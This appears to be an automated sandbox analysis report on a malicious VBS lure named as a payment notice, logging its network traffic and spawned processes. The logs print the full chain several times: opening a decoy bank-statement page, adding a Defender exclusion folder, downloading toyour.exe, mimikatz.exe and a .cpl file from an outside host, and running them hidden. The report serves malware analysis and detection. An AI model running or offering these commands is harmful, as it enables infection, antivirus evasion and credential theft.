Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50453 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50293 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownHTTPS traffic detected: 185.39.18.56:443 -> 192.168.2.10:50024 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.39.18.56:443 -> 192.168.2.10:50157 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.39.18.56:443 -> 192.168.2.10:50278 version: TLS 1.2

System Summary

barindex
Sample has a suspicious name (potential lure to open the executable)
Source: Payment_Activity_0079_2025-2-17.vbsStatic file information: Suspicious name
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b control C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-StatementJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRARJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b control C:\\WinXRAR\\ncpa.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\\WinXRAR\\mimikatz.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process msedge https://www.scribd.com/document/806838445/Bank-StatementJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Payment_Activity_0079_2025-2-17.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.expl.evad.winVBS@108/300@72/100
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67B433DA-1B20.pmaJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9312:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9124:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9348:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skh0feyu.34t.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\\WinXRAR\\ncpa.cpl
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Activity_0079_2025-2-17.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.scribd.com/document/806838445/Bank-Statement
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2948 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:3
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6992 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7140 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b control C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\\WinXRAR\\ncpa.cpl
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=5552 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7020 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-StatementJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRARJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b control C:\\WinXRAR\\ncpa.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\\WinXRAR\\mimikatz.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process msedge https://www.scribd.com/document/806838445/Bank-StatementJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.scribd.com/document/806838445/Bank-Statement Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2948 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6992 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7140 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
